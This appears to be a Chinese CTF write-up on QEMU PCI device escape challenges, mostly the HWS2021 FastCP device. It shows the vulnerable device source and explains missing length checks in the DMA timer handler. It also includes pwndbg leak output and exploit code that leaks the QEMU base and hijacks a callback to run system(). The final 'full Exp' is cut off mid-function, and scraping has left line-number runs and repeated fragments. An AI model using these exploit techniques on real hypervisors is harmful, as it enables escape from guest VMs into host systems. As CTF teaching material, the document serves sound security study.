uint64_t phys_end; unsigned long long res_flags; bool inited; } mmio_ctx_t ; static mmio_ctx_t g_mmio = {0 };static int build_paths (const char * bdf_or_path, char * resource_txt, size_t txt_sz, char * dev_dir, size_t dir_sz) { if (!bdf_or_path || !*bdf_or_path) { errno = EINVAL; return -1 ; } if (strchr (bdf_or_path, '/' )) { snprintf (resource_txt, txt_sz, "%s" , bdf_or_path); snprintf (dev_dir, dir_sz, "%s" , bdf_or_path); char * slash = strrchr (dev_dir, '/' ); if (!slash) { errno = EINVAL; return -1 ; } *slash = '\0' ; if (strstr (resource_txt, "/resource" ) && resource_txt[strlen (resource_txt) - 1 ] >= '0' && resource_txt[strlen (resource_txt) - 1 ] <= '9' ) { snprintf (resource_txt, txt_sz, "%s/resource" , dev_dir); } } else { snprintf (resource_txt, txt_sz, "/sys/bus/pci/devices/%s/resource" , bdf_or_path); snprintf (dev_dir, dir_sz, "/sys/bus/pci/devices/%s" , bdf_or_path); } return 0 ; } static int parse_mem_bar (const char * resource_txt, int bar_idx, unsigned long long * start, unsigned long long * end, unsigned long long * flags, int * picked_idx) { FILE* fp = fopen(resource_txt, "r" ); if (!fp) return -1 ; int idx = 0 , sel = -1 ; char line[256 ]; while (fgets(line, sizeof (line), fp)) { unsigned long long s = 0 , e = 0 , f = 0 ; if (sscanf (line, "%llx %llx %llx" , &s, &e, &f) != 3 ) { idx++; continue ; } if (bar_idx >= 0 ) { if (idx == bar_idx) { if (!(f & IORESOURCE_MEM) || e < s) { fclose(fp); errno = EINVAL; return -1 ; } sel = idx; if (start) *start = s; if (end) *end = e; if (flags) *flags = f; break ; } } else { if (idx <= 5 && (f & IORESOURCE_MEM)) { if (e < s) { fclose(fp); errno = ERANGE; return -1 ; } sel = idx; if (start) *start = s; if (end) *end = e; if (flags) *flags = f; break ; } } idx++; } fclose(fp); if (sel < 0 ) { errno = ENOENT; return -1 ; } if (picked_idx) *picked_idx = sel; return 0 ; } int mmio_init (const char * bdf_or_path, int bar_idx) { if (g_mmio.inited) { errno = EALREADY; return -1 ; } char resource_txt[PATH_MAX]; char dev_dir[PATH_MAX]; if (build_paths(bdf_or_path, resource_txt, sizeof (resource_txt), dev_dir, sizeof (dev_dir)) != 0 ) return -1 ; unsigned long long start = 0 , end = 0 , flags = 0 ; int res_idx = -1 ; if (parse_mem_bar(resource_txt, bar_idx, &start, &end, &flags, &res_idx) != 0 ) return -1 ; size_t size = (size_t )((end - start) + 1ULL ); size_t pg = (size_t )sysconf(_SC_PAGESIZE); size_t map_len = (size + pg - 1 ) & ~(pg - 1 ); char res_path[PATH_MAX]; snprintf (res_path, sizeof (res_path), "%s/resource%d" , dev_dir, res_idx); int fd = open(res_path, O_RDWR | O_SYNC); if (fd < 0 ) return -1 ; void * map = mmap(NULL , map_len, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0 ); if (map == MAP_FAILED) { int sv = errno; close(fd); errno = sv; return -1 ; } g_mmio.bar = (volatile uint8_t *)map ; g_mmio.size = size; g_mmio.map_len = map_len; g_mmio.fd = fd; g_mmio.res_idx = res_idx; g_mmio.phys_start = (uint64_t )start; g_mmio.phys_end = (uint64_t )end; g_mmio.res_flags = flags; g_mmio.inited = true ; return 0 ; } void mmio_fini (void ) { if (!g_mmio.inited) return ; if (g_mmio.bar) munmap((void *)g_mmio.bar, g_mmio.map_len); if (g_mmio.fd >= 0 ) close(g_mmio.fd); memset (&g_mmio, 0 , sizeof (g_mmio)); } volatile void * mmio_base (void ) { return g_mmio.bar; }size_t mmio_size (void ) { return g_mmio.size; }int mmio_bar_index (void ) { return g_mmio.res_idx; }uint64_t mmio_phys_base (void ) { return g_mmio.phys_start; }uint64_t mmio_phys_limit (void ) { return g_mmio.phys_end; } uint64_t mmio_offset_to_phys (size_t off) { if (!g_mmio.inited) { errno = EPERM; return 0 ; } if (off >= g_mmio.size) { errno = ERANGE; return 0 ; } return g_mmio.phys_start + (uint64_t )off; } uint64_t mmio_virt_to_phys (const void * p) { if (!g_mmio.inited || !p) { errno = EPERM; return 0 ; } uintptr_t base = (uintptr_t )g_mmio.bar; uintptr_t addr = (uintptr_t )p; if (addr < base || addr >= base + g_mmio.size) { errno = EINVAL; return 0 ; } size_t off = (size_t )(addr - base); return g_mmio.phys_start + (uint64_t )off; } static inline int chk (size_t off, size_t width) { if (!g_mmio.inited) { errno = EPERM; return -1 ; } if (off + width > g_mmio.size) { errno = ERANGE; return -1 ; } return 0 ; } uint8_t mmio_read8 (size_t off) { if (chk(off, 1 )) return 0 ; return *(volatile uint8_t *)(g_mmio.bar + off); } uint16_t mmio_read16 (size_t off) { if (chk(off, 2 )) return 0 ; return *(volatile uint16_t *)(g_mmio.bar + off); } uint32_t mmio_read32 (size_t off) { if (chk(off, 4 )) return 0 ; return *(volatile uint32_t *)(g_mmio.bar + off); } uint64_t mmio_read64 (size_t off) { if (chk(off, 8 )) return 0 ; return *(volatile uint64_t *)(g_mmio.bar + off); } void mmio_write8 (size_t off, uint8_t v) { if (chk(off, 1 )) return ; *(volatile uint8_t *)(g_mmio.bar + off) = v; } void mmio_write16 (size_t off, uint16_t v) { if (chk(off, 2 )) return ; *(volatile uint16_t *)(g_mmio.bar + off) = v; } void mmio_write32 (size_t off, uint32_t v) { if (chk(off, 4 )) return ; *(volatile uint32_t *)(g_mmio.bar + off) = v; } void mmio_write64 (size_t off, uint64_t v) { if (chk(off, 8 )) return ; *(volatile uint64_t *)(g_mmio.bar + off) = v; } volatile void * mmio_ptr (size_t off) { if (chk(off, 1 )) return NULL ; return (volatile void *)(g_mmio.bar + off); } void qword_dump (char * desc, void * addr, int len) { uint64_t * buf64 = (uint64_t *)addr; uint8_t * buf8 = (uint8_t *)addr; if (desc != NULL ) { printf ("[*] %s:\n" , desc); } for (int i = 0 ; i < len / 8 ; i += 4 ) { printf (" %04x" , i * 8 ); for (int j = 0 ; j < 4 ; j++) { i + j < len / 8 ? printf (" 0x%016lx" , buf64[i + j]) : printf (" " ); } printf (" " ); for (int j = 0 ; j < 32 && j + i * 8 < len; j++) { printf ("%c" , isprint (buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.' ); } puts ("" ); } } int main (int argc, char * argv[]) { mmio_init("0000:00:04.0" , 0 ); pio_init("0000:00:04.0" , 1 ); size_t qemu_base = (mmio_read32(0x20 ) | (uint64_t )mmio_read32(0x24 ) << 32 ) - 0x3a9ea8 ; printf ("[*] qemu_base: %#llx\n" , qemu_base); size_t system_plt = qemu_base + 0x2ccb60 ; printf ("[*] system@plt addr: %#llx\n" , system_plt); uint32_t key[10 ]; for (int i = 0 ; i < 10 ; i++) { mmio_write32(i * 4 , 0 ); key[i] = mmio_read32(i * 4 ); } qword_dump("leak key" , key, sizeof (key)); char cmd[] = "/usr/bin/gnome-calculator" ; for (int i = 0 ; i < strlen (cmd); i += 4 ) { mmio_write32(i, (*(uint32_t *)&cmd[i]) ^ key[i / 4 ]); } mmio_write32(8 * 4 , (system_plt & 0xFFFFFFFF ) ^ key[8 ]); mmio_write32(9 * 4 , (system_plt >> 32 ) ^ key[9 ]); pio_write32(0x660 , 0x114514 ); return 0 ; }
HWS2021 FastCP 环境搭建 1 sudo apt install -y libjpeg62
漏洞分析 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 #include "qemu/osdep.h" #include "hw/pci/pci.h" #include "hw/qdev-core.h" #include "qapi/error.h" #include "qemu/timer.h" #include "exec/memory.h" #include "hw/irq.h" #include "qemu/module.h" #include "qom/object.h" #define TYPE_FASTCP "FastCP" OBJECT_DECLARE_SIMPLE_TYPE(FastCPState, FASTCP) #define FASTCP_CMD_LIST (1ULL << 0) #define FASTCP_CMD_PULL (1ULL << 1) #define FASTCP_CMD_PUSH (1ULL << 2) #define FASTCP_CMD_IRQ (1ULL << 3) #define FASTCP_IRQ_STATUS_COMPLETE 0x100u #define FASTCP_MMIO_SIZE (0x100000ULL) #define FASTCP_TMR_SCALE 1000000 typedef struct CP_state { uint64_t CP_list_src; uint64_t CP_list_cnt; uint64_t cmd; } CP_state; typedef struct FastCP_CP_INFO { uint64_t CP_src; uint64_t CP_cnt; uint64_t CP_dst; } FastCP_CP_INFO; typedef struct FastCPState { PCIDevice pdev; MemoryRegion mmio; CP_state cp_state; uint8_t handling; uint8_t _pad[3 ]; uint32_t irq_status; char CP_buffer[0x1000 ]; QEMUTimer cp_timer; } FastCPState; static uint64_t fastcp_mmio_read (void *opaque, hwaddr addr, unsigned size) ;static void fastcp_mmio_write (void *opaque, hwaddr addr, uint64_t val, unsigned size) ;static void fastcp_cp_timer (void *opaque) ;static const MemoryRegionOps fastcp_mmio_ops = { .read = fastcp_mmio_read, .write = fastcp_mmio_write, .endianness = DEVICE_NATIVE_ENDIAN, .valid = { .max_access_size = 8 , }, .impl = { .max_access_size = 8 , }, }; static void pci_FastCP_uninit (PCIDevice *pdev) ;static void pci_FastCP_realize (PCIDevice *pdev, Error **errp) ;static void FastCP_class_init (ObjectClass *oc, void *data) { DeviceClass *dc = DEVICE_CLASS(oc); PCIDeviceClass *k = PCI_DEVICE_CLASS(oc); k->vendor_id = 0xDEAD ; k->device_id = 0xBEEF ; k->revision = 1 ; k->realize = pci_FastCP_realize; k->exit = pci_FastCP_uninit; k->class_id = PCI_CLASS_OTHERS; dc->categories[0 ] |= 0x80 ; } static void FastCP_instance_init (Object *obj) { FastCPState *s = FASTCP(obj); memset (s->CP_buffer, 0 , sizeof (s->CP_buffer)); s->cp_state.CP_list_src = 0 ; s->cp_state.CP_list_cnt = 0 ; s->cp_state.cmd = 0 ; s->handling = 0 ; s->irq_status = 0 ; } static void pci_FastCP_uninit (PCIDevice *pdev) { FastCPState *s = FASTCP(pdev); timer_del(&s->cp_timer); msi_uninit(pdev); } static void pci_FastCP_realize (PCIDevice *pdev, Error **errp) { FastCPState *s = FASTCP(pdev); pdev->config[61 ] = 1 ; if (!msi_init(pdev, 0 , 1 , 1 , false , errp)) { timer_init_full(&s->cp_timer, NULL , QEMU_CLOCK_VIRTUAL, FASTCP_TIMER_SCALE, 0 , fastcp_cp_timer, s); memory_region_init_io(&s->mmio, OBJECT(&s->pdev.qdev), &fastcp_mmio_ops, s, "fastcp-mmio" , FASTCP_MMIO_SIZE); pci_register_bar(pdev, 0 , 0 , &s->mmio); s->irq_status = 0 ; } } static uint64_t fastcp_mmio_read (void *opaque, hwaddr addr, unsigned size) { FastCPState *s = opaque; if (size != 8 || addr > 0x1F ) { return ~0ULL ; } if (addr == 0x08 ) { return s->cp_state.CP_list_src; } if (addr <= 0x08 ) { if (addr == 0x00 ) { return s->handling; } return ~0ULL ; } if (addr == 0x10 ) { return s->cp_state.CP_list_cnt; } if (addr == 0x18 ) { return s->cp_state.cmd; } return ~0ULL ; } static void fastcp_mmio_write (void *opaque, hwaddr addr, uint64_t val, unsigned size) { FastCPState *s = opaque; if (addr <= 0x1F && size == 8 ) { if (addr == 0x10 ) { if (s->handling != 1 ) { s->cp_state.CP_list_cnt = val; } } else if (addr == 0x18 ) { if (s->handling != 1 ) { s->cp_state.cmd = val; int64_t now_ns = qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL); timer_mod(&s->cp_timer, now_ns / 1000000 + 100 ); } } else if (addr == 0x08 ) { if (s->handling != 1 ) { s->cp_state.CP_list_src = val; } } } } static inline void fastcp_raise_irq (FastCPState *s) { s->irq_status |= FASTCP_IRQ_STATUS_COMPLETE; if (msi_enabled(&s->pdev)) { msi_notify(&s->pdev, 0 ); } else { pci_set_irq(&s->pdev, 1 ); } } static inline void fastcp_clear_bits_then_maybe_irq (FastCPState *s, uint64_t bits_to_clear) { s->cp_state.cmd &= ~bits_to_clear; if (s->cp_state.cmd & FASTCP_CMD_IRQ) { fastcp_raise_irq(s); } } static void fastcp_cp_timer (void *opaque) { FastCPState *s = opaque; uint64_t cmd = s->cp_state.cmd; FastCP_CP_INFO cp_info; memset (&cp_info, 0 , sizeof (cp_info)); switch (cmd) { case FASTCP_CMD_PULL: { bool one = (s->cp_state.CP_list_cnt == 1 ); s->handling = 1 ; if (one) { cpu_physical_memory_rw(s->cp_state.CP_list_src, &cp_info, sizeof (FastCP_CP_INFO), 0 ); if (tmp.CP_cnt > 0x1000 ) { fastcp_clear_bits_then_maybe_irq(s, FASTCP_CMD_LIST | FASTCP_CMD_PULL); s->handling = 0 ; return ; } cpu_physical_memory_rw(cp_info.CP_src, s->CP_buffer, cp_info.CP_cnt, 0 ); } break ; } case FASTCP_CMD_PUSH: { bool one = (s->cp_state.CP_list_cnt == 1 ); s->handling = 1 ; if (one) { cpu_physical_memory_rw(s->cp_state.CP_list_src, &cp_info, sizeof (FastCP_CP_INFO), 0 ); cpu_physical_memory_rw(cp_info.CP_dst, s->CP_buffer, cp_info.CP_cnt, 1 ); fastcp_clear_bits_then_maybe_irq(s, FASTCP_CMD_LIST | FASTCP_CMD_PULL | FASTCP_CMD_PUSH); s->handling = 0 ; return ; } break ; } case FASTCP_CMD_LIST: { uint64_t cnt = s->cp_state.CP_list_cnt; s->handling = 1 ; if (cnt > 0x10 ) { uint64_t i = 0 ; do { FastCP_CP_INFO item; cpu_physical_memory_rw(s->cp_state.CP_list_src + sizeof (FastCP_CP_INFO) * i, &item, sizeof (FastCP_CP_INFO), 0 ); cpu_physical_memory_rw(item.CP_src, s->CP_buffer, item.CP_cnt, 0 ); cpu_physical_memory_rw(item.CP_dst, s->CP_buffer, item.CP_cnt, 1 ); i++; } while (s->cp_state.CP_list_cnt > i); } else { if (cnt == 0 ) { fastcp_clear_bits_then_maybe_irq(s, FASTCP_CMD_LIST); s->handling = 0 ; return ; } uint64_t off = 0 , seen = 0 ; while (1 ) { FastCP_CP_INFO tmp; cpu_physical_memory_rw(s->cp_state.CP_list_src + off, &tmp, sizeof (FastCP_CP_INFO), 0 ); if (tmp.CP_cnt > 0x1000 ) { fastcp_clear_bits_then_maybe_irq(s, FASTCP_CMD_LIST); s->handling = 0 ; return ; } seen++; off += sizeof (FastCP_CP_INFO); if (seen >= s->cp_state.CP_list_cnt) { if (s->cp_state.CP_list_cnt == 0 ) { break ; } uint64_t i = 0 ; do { FastCP_CP_INFO item; cpu_physical_memory_rw(s->cp_state.CP_list_src + sizeof (FastCP_CP_INFO) * i, &item, sizeof (FastCP_CP_INFO), 0 ); cpu_physical_memory_rw(item.CP_src, s->CP_buffer, item.CP_cnt, 0 ); cpu_physical_memory_rw(item.CP_dst, s->CP_buffer, item.CP_cnt, 1 ); i++; } while (s->cp_state.CP_list_cnt > i); break ; } } } fastcp_clear_bits_then_maybe_irq(s, FASTCP_CMD_LIST); s->handling = 0 ; return ; } default : return ; } s->cp_state.cmd = 0 ; s->handling = 0 ; } static const TypeInfo fastcp_info = { .name = TYPE_FASTCP, .parent = TYPE_PCI_DEVICE, .instance_size = sizeof (FastCPState), .instance_init = FastCP_instance_init, .class_init = FastCP_class_init, }; static void pci_FastCP_register_types (void ) { type_register_static(&fastcp_info); } static void do_qemu_init_pci_FastCP_register_types (void ) { register_module_init(pci_FastCP_register_types, MODULE_INIT_QOM); }
其中 fastcp_cp_timer 的 case 4 和 case 1 的 cnt > 0x10 都没有进行长度检查,可造成越界读写。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 case FASTCP_CMD_PUSH: { bool one = (s->cp_state.CP_list_cnt == 1 ); s->handling = 1 ; if (one) { cpu_physical_memory_rw(s->cp_state.CP_list_src, &cp_info, sizeof (FastCP_CP_INFO), 0 ); cpu_physical_memory_rw(cp_info.CP_dst, s->CP_buffer, cp_info.CP_cnt, 1 ); fastcp_clear_bits_then_maybe_irq(s, FASTCP_CMD_LIST | FASTCP_CMD_PULL | FASTCP_CMD_PUSH); s->handling = 0 ; return ; } break ; } case FASTCP_CMD_LIST: { uint64_t cnt = s->cp_state.CP_list_cnt; s->handling = 1 ; if (cnt > 0x10 ) { uint64_t i = 0 ; do { FastCP_CP_INFO item; cpu_physical_memory_rw(s->cp_state.CP_list_src + sizeof (FastCP_CP_INFO) * i, &item, sizeof (FastCP_CP_INFO), 0 ); cpu_physical_memory_rw(item.CP_src, s->CP_buffer, item.CP_cnt, 0 ); cpu_physical_memory_rw(item.CP_dst, s->CP_buffer, item.CP_cnt, 1 ); i++; } while (s->cp_state.CP_list_cnt > i); } else { } fastcp_clear_bits_then_maybe_irq(s, FASTCP_CMD_LIST); s->handling = 0 ; return ; }
cpu_physical_memory_rw() 在 QEMU 里的用途是在 系统物理地址空间 (address_space_memory)上,执行一段按字节 的读/写搬运。常见于“仿真设备做 DMA,把 guest 物理内存拷到 QEMU 本地缓冲、或反之”的场景。典型声明 (不同版本几乎一致):
1 2 3 4 5 6 7 8 9 void cpu_physical_memory_rw (hwaddr addr, void *buf, hwaddr len, int is_write) ;static inline void cpu_physical_memory_read (hwaddr addr, void *buf, hwaddr len) { cpu_physical_memory_rw(addr, buf, len, 0 ); } static inline void cpu_physical_memory_write (hwaddr addr, const void *buf, hwaddr len) { cpu_physical_memory_rw(addr, (void *)buf, len, 1 ); }
参数解释:
addr:guest 物理地址(GPA) ,而非虚拟地址/设备地址。
buf:QEMU 进程内的 host 指针。
len:字节数;函数内部可能按设备可接受的粒度(1/2/4/8 等)拆分成多次访问 。
is_write:0=从 guest→host ,1=从 host→guest 。
它只是个薄封装,会直接转调:
1 2 address_space_rw(&address_space_memory, addr, MEMTXATTRS_UNSPECIFIED, buf, len, is_write);
也就是说,它总是面向系统物理地址空间 ,并且用默认事务属性 MEMTXATTRS_UNSPECIFIED。
越界读可以泄露后面的 QEMUTimer 的 timer_list 还有程序地址。
pwndbg> u 1
0x5555558dd0d7 <fastcp_cp_timer+599> mov ecx , 1 ECX => 1
► 0x5555558dd0dc <fastcp_cp_timer+604> call cpu_physical_memory_rw <cpu_physical_memory_rw >
rdi : 0x51e8000
rsi : 0x5555572d2ec0 ◂— 0
rdx : 0x1040
rcx : 1
0x5555558dd0e1 <fastcp_cp_timer+609> mov rax , qword ptr [ rbx + 0x9f0 ]
pwndbg> telescope 0x5555572d2ec0+0x1000
00:0000│ 0x5555572d3ec0 ◂— 0xffffffffffffffff
01:0008│ 0x5555572d3ec8 —▸ 0x5555565fa6e0 —▸ 0x5555563b0db0 (qemu_clocks+16) —▸ 0x5555565fab10 ◂— 0x5555563b0db0 (qemu_clocks+16)
02:0010│ 0x5555572d3ed0 —▸ 0x5555558dce80 (fastcp_cp_timer) ◂— push r13
03:0018│ 0x5555572d3ed8 —▸ 0x5555572d24c0 —▸ 0x55555642c220 —▸ 0x555556402060 —▸ 0x5555564021e0 ◂— ...
04:0020│ 0x5555572d3ee0 ◂— 0
05:0028│ 0x5555572d3ee8 ◂— 0xf424000000000
06:0030│ 0x5555572d3ef0 ◂— 0
07:0038│ 0x5555572d3ef8 ◂— 0x61 /* 'a' */
pwndbg> p *(QEMUTimer*)0x5555572d3ec0
$1 = {
expire_time = -1,
timer_list = 0x5555565fa6e0 ,
cb = 0x5555558dce80 <fastcp_cp_timer >,
opaque = 0x5555572d24c0 ,
next = 0x0 ,
attributes = 0,
scale = 1000000
}
完整 Exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493 494 495 496 497 498 499 500 501 502 503 504 505 506 507 508 509 510 511 512 513 514 515 516 517 518 519 520 521 522 523 524 525 526 527 528 529 530 531 532 533 534 535 536 537 538 539 540 541 542 543 544 545 546 547 548 549 550 551 552 553 554 555 556 557 558 559 560 561 562 563 564 565 566 567 568 569 570 571 572 573 574 575 576 577 578 579 580 581 582 583 584 585 586 587 588 589 590 591 592 593 594 595 596 597 598 599 600 601 602 603 604 605 606 607 608 609 610 611 612 613 614 615 616 typedef struct hash_map_entry { uint64_t key, value; struct hash_map_entry* next ; } hash_map_entry; typedef struct hash_map { hash_map_entry** entry; // 桶数组 size_t cap; // 桶数(2 的幂) size_t size; // 已存键值对个数 } hash_map; static inline uint64_t mix64(uint64_t x) { x ^= x >> 30 ; x *= 0xbf58476d1ce4e5b9ULL; x ^= x >> 27 ; x *= 0x94d049bb133111ebULL; x ^= x >> 31 ; return x; } static inline size_t idx_for(const hash_map* m, uint64_t key) { return (size_t)(mix64(key) & (m->cap - 1 )); // cap 必须是 2 的幂 } static void rehash(hash_map* m, size_t new_cap) { hash_map_entry** old = m->entry; size_t old_cap = m->cap; m->entry = (hash_map_entry**)calloc(new_cap, sizeof(*m->entry)); m->cap = new_cap; for (size_t i = 0 ; i < old_cap; ++i) { for (hash_map_entry *e = old[i], *n; e; e = n) { n = e->next ; size_t h = (size_t)(mix64(e->key) & (new_cap - 1 )); e->next = m->entry[h]; m->entry[h] = e; } } free(old); } void hash_map_init(hash_map* m) { m->cap = HM_INIT_CAP; m->size = 0 ; m->entry = (hash_map_entry**)calloc(m->cap, sizeof(*m->entry)); } uint64_t hash_map_get(hash_map* m, uint64_t key) { size_t h = idx_for(m, key); for (hash_map_entry* e = m->entry[h]; e; e = e->next ) { if (e->key == key) return e->value; } return UINT64_MAX; // 未找到(等价于你原来的 -1 ) } void hash_map_set(hash_map* m, uint64_t key, uint64_t value) { // 负载因子到 0.75 时扩容一倍 if ((m->size + 1 ) * LOAD_DEN >= m->cap * LOAD_NUM) { rehash(m, m->cap ? (m->cap << 1 ) : HM_INIT_CAP); } size_t h = idx_for(m, key); for (hash_map_entry* e = m->entry[h]; e; e = e->next ) { if (e->key == key) { e->value = value; return ; } } hash_map_entry* e = (hash_map_entry*)calloc(1 , sizeof(*e)); e->key = key; e->value = value; e->next = m->entry[h]; m->entry[h] = e; m->size++; } void hash_map_del(hash_map* m, uint64_t key) { size_t h = idx_for(m, key); hash_map_entry *prev = NULL, *e = m->entry[h]; while (e) { if (e->key == key) { if (prev) prev->next = e->next ; else m->entry[h] = e->next ; free(e); m->size--; return ; } prev = e; e = e->next ; } } void hash_map_clear(hash_map* m) { if (!m || !m->entry) return ; for (size_t i = 0 ; i < m->cap; ++i) { for (hash_map_entry *e = m->entry[i], *n; e; e = n) { n = e->next ; free(e); } } free(m->entry); m->entry = NULL; m->cap = m->size = 0 ; } static uint64_t virt_to_phys(void* vaddr) { long pagesize = sysconf(_SC_PAGESIZE); uint64_t va = (uint64_t)vaddr; uint64_t page_index = va / pagesize; uint64_t offset = page_index * sizeof(uint64_t); int fd = open ("/proc/self/pagemap" , O_RDONLY); if (fd < 0 ) return 0 ; uint64_t entry = 0 ; ssize_t n = pread(fd, &entry, sizeof(entry), offset); close(fd); if (n != sizeof(entry)) return 0 ; if (!(entry & (1ULL << 63 )) || (entry & (1ULL << 62 ))) { // not present or swapped errno = EFAULT; return 0 ; } uint64_t pfn = entry & ((1ULL << 55 ) - 1 ); return (pfn * pagesize) + (va % pagesize); } typedef struct { void* vaddr[2 ]; size_t paddr; } adjacent_pages_buf; void release_pages(hash_map* map ) { for (int i = 0 ; i < PAGE_SIZE; i++) { for (hash_map_entry* entry = map ->entry[i]; entry; entry = entry->next ) { assert (munmap((void *) entry->value, PAGE_SIZE) == 0 ); } } hash_map_clear(map ); } void get_adjacent_pages(adjacent_pages_buf* buf) { long pagesize = sysconf(_SC_PAGESIZE); hash_map* map = calloc(1 , sizeof(hash_map*)); hash_map_init(map ); while (true) { void* vaddr = mmap(NULL, pagesize, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS | MAP_POPULATE, -1 , 0 ); size_t paddr = virt_to_phys(vaddr); printf("[*] new page %p %p\n" , paddr, vaddr); if ((buf->vaddr[1 ] = (void*)hash_map_get(map , paddr + pagesize)) != (void*)-1 ) { buf->vaddr[0 ] = (void*)vaddr; buf->paddr = paddr; hash_map_del(map , paddr + pagesize); release_pages(map ), free(map ); return ; } if ((buf->vaddr[0 ] = (void*)hash_map_get(map , paddr - pagesize)) != (void*)-1 ) { buf->vaddr[1 ] = (void*)vaddr; buf->paddr = paddr - pagesize; hash_map_del(map , paddr - pagesize); hash_map_clear(map ), free(map ); return ; } hash_map_set(map , paddr, (size_t)vaddr); } } void qword_dump(char* desc, void* addr, int len ) { uint64_t* buf64 = (uint64_t*)addr; uint8_t* buf8 = (uint8_t*)addr; if (desc != NULL) { printf("[*] %s:\n" , desc); } for (int i = 0 ; i < len / 8 ; i += 4 ) { printf(" %04x" , i * 8 ); for (int j = 0 ; j < 4 ; j++) { i + j < len / 8 ? printf(" 0x%016lx" , buf64[i + j]) : printf(" " ); } printf(" " ); for (int j = 0 ; j < 32 && j + i * 8 < len ; j++) { printf("%c" , isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.' ); } puts("" ); } } typedef struct { volatile uint8_t* bar; // 映射后的虚拟基址 size_t size; // 资源真实大小(end - start + 1 ) size_t map_len; // 实际 mmap 的长度(按页对齐) int fd; // 打开的 /sys/.../resourceN int res_idx; // 选中的 resource 行号(BAR 号 0. .5 ) // 新增:物理信息 uint64_t phys_start; // 该映射对应的设备物理起始地址(BAR 起点) uint64_t phys_end; // 物理结束地址(含端点) unsigned long long res_flags; // resource 行里的 flags(可用于判断 WC 等) bool inited; } mmio_ctx_t; static mmio_ctx_t g_mmio = {0 }; /* --- 内部:把 BDF 或 /sys/.../resource 解析成两个路径 --- */ static int build_paths(const char* bdf_or_path, char* resource_txt, size_t txt_sz, char* dev_dir, size_t dir_sz) { if (!bdf_or_path || !*bdf_or_path) { errno = EINVAL; return -1 ; } if (strchr(bdf_or_path, '/' )) { /* 直接传了 /sys/.../resource 或 /sys/.../resourceN */ snprintf(resource_txt, txt_sz, "%s" , bdf_or_path); snprintf(dev_dir, dir_sz, "%s" , bdf_or_path); char* slash = strrchr(dev_dir, '/' ); if (!slash) { errno = EINVAL; return -1 ; } *slash = '\0' ; // 如果传进来的是 resourceN,把它回退到目录再去拼 resource if (strstr(resource_txt, "/resource" ) && resource_txt[strlen(resource_txt) - 1 ] >= '0' && resource_txt[strlen(resource_txt) - 1 ] <= '9' ) { snprintf(resource_txt, txt_sz, "%s/resource" , dev_dir); } } else { /* 传的是 BDF */ snprintf(resource_txt, txt_sz, "/sys/bus/pci/devices/%s/resource" , bdf_or_path); snprintf(dev_dir, dir_sz, "/sys/bus/pci/devices/%s" , bdf_or_path); } return 0 ; } /* --- 内部:解析 resource 文本,找内存型 BAR(或指定 BAR) --- */ static int parse_mem_bar(const char* resource_txt, int bar_idx, unsigned long long* start, unsigned long long* end, unsigned long long* flags, int * picked_idx) { FILE* fp = fopen(resource_txt, "r" ); if (!fp) return -1 ; int idx = 0 , sel = -1 ; char line[256 ]; while (fgets(line, sizeof(line), fp)) { unsigned long long s = 0 , e = 0 , f = 0 